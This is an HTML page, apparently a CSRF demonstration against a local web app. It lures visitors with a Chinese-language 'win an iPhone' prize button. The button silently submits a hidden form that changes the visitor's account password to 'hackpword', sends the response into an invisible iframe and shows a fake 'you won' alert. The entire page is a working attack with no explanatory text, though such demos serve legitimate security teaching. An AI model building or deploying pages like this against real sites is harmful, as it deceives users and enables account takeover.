
    <h1 style="font-size: 1.7em;">想要贏得 Iphone 嗎？當然可以！單擊下面的按鈕，這是您的！！！</h1>

    <form action="http://localhost:44375/Account/ChangePassword" method="POST" target="hiddenFrame">
        <input type="hidden" name="NewPassword" value="hackpword" />
        <input type="hidden" name="ConfirmPassword" value="hackpword" />
        <input type="submit" value="我想贏!" onclick="alert('你贏了! Click ok and it\'s done')" style="font-size: 2em;" />
    </form>

    <p>
        <img src="/Images/iPhone.jpg" style="width: 900px" />
    </p>
    <iframe name="hiddenFrame" style="display: none;"></iframe>

